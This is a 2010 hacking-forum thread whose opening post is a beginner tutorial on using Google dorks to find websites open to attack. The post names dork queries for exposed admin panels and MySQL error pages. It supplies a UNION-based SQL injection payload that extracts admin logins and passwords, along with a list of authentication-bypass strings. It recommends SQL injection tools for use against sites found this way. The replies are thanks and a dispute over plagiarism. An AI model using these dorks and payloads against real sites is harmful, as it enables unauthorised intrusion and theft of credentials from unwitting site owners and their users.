|
---===How To Find Vulnerable Websites From Google ? [NoOb fRiendly]===---
|
|
08-25-2010, 07:57 AM
Post: #1
|
|||
|
|||
|
---===How To Find Vulnerable Websites From Google ? [NoOb fRiendly]===--- For this stuff You will have to just add some simple google query. Here are some query and its brief Introduction. Query Type 1 :- intitle:"admin page" inurl:/admin/intext:Edit Information Of Query :- This query will Directly bypass the admin panel and will redirect to the page of the admin right through where admin edit the website by adding and deleting contents of the website. Drawback :- This google query is nice but will work for only that sites which's security is very very low. Query Type 2 :-inurl:/texts/?newsid= Information Of Query :-This query will show you all the results of the infected url/script,at there we can make and SQL injection attack weather it is in the POST form or the GET form.I tried here to give you guys a small code of manual SQL injection for only this particular script.For me,it worked many times.Let's hope it will also work for you guys.enjoy. Code: /texts?newsid=-1+union+select+1,2,concat_ws(0x3a,login,password), 4,5,6,7+from+b_adminÔÇöTarget Example :- Code: http://www.TargetWebsite.domain/news/texts?newsid=-1+union+select+1,2,concat_ws%280x3a,login,password%29,%204,5,6,7+from+b_admin--Query Type 3 :- inurl:"id=" & intext:"Warning: mysql_fetch_assoc() Information Of Query :- This query will show you all the results on the google page which starts from the index.php?id= or index.asp?id=.But the basic benifit is that this query will directly redirect you on the page which will have the MYSQL database or stack overflow error.So this is a nice query to find another SQL vulnerable site,because it gives the direct link of that.In exploit scanner and another software you will find only some links.As you guys know google updates every minutes because every new website's information they have to update in their database.so enjot this query. Attack Details :- SQL injection :- Tools :- havij 1.7,SQLi Helper 2.7 ,Web crusier,Acunetix Web Vulnerability Scanner 6 Or mannual SQL injection method. Some Other Queries Related To This Topic :- Code: inurl:"id=" & intext:"Warning: mysql_fetch_array()Information Of Queries :- As Above With the minor changes.But our target is the URL so no need to go into the deep od the description. Attack Detail :- Same As Above Query Type 4 :- Code: Warning: mysql_result():Information Of Query :- -->I think no need for the descpriction.Each query has its own quality.Each query You will give to google it will redirect you the thousands of the pages.and then you have to find the vulnerable url and you can made an attack. -->You can also use this dorks in the exploit scanner which will directly do a process and give you the vulnerable sites. Some Almost Working Useful Advance SQL Injection Cheatcodes To By Pass the Admin Panel :- admin admin' -- admin' # admin'/* ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1-- Another SQL injection Cheat codes Works Sometimes :- Code: ' or '1'='1This is SPARX and thank you all guys for watching my tutorial. Have a nice day Enjoy ![]() ![]() |
|||
|
08-25-2010, 11:12 AM
Post: #2
|
|||
|
|||
|
The good old SQL injection attack, along with the commands.
Good for those unbeknown to this methodology. Thanks mate.
|
|||
|
08-25-2010, 12:42 PM
Post: #3
|
|||
|
|||
|
ur welcome...old is gold....but not so much old yar.queries of database's error are new i think....
|
|||
|
08-25-2010, 04:35 PM
Post: #4
|
|||
|
|||
|
Very nice and certainly noob friendly !
|
|||
|
08-26-2010, 11:09 AM
Post: #5
|
|||
|
|||
|
thnx admin....have a nice day,.
|
|||
|
09-02-2010, 03:03 AM
Post: #6
|
|||
|
|||
|
09-04-2010, 12:29 PM
Post: #7
|
|||
|
|||
|
lol....i have posted on the docstoc.com...he he he better luck next time..
|
|||
|
09-09-2010, 04:03 AM
Post: #8
|
|||
|
|||
(09-04-2010 12:29 PM)[email protected] Wrote: You are not allowed to view links. Register or Login to view.lol....i have posted on the docstoc.com...he he he better luck next time.. Good try, but a fail. I contacted the author of the original post on docstoc who said you're leaching. "hehehe better luck next time" to you too. |
|||
|
12-29-2010, 03:37 PM
Post: #9
|
|||
|
|||
|
good job keep it up ;)
|
|||
|
08-12-2011, 06:47 PM
Post: #10
|
|||
|
|||
|
Good job sir.
Great thread. |
|||
|
« Next Oldest | Next Newest »
|

Home
Upgrade
Members
Search
Chat
Help


![[Image: qq8ikx.jpg]](http://i44.tinypic.com/qq8ikx.jpg)
![[Image: enjoym.png]](http://img442.imageshack.us/img442/8918/enjoym.png)



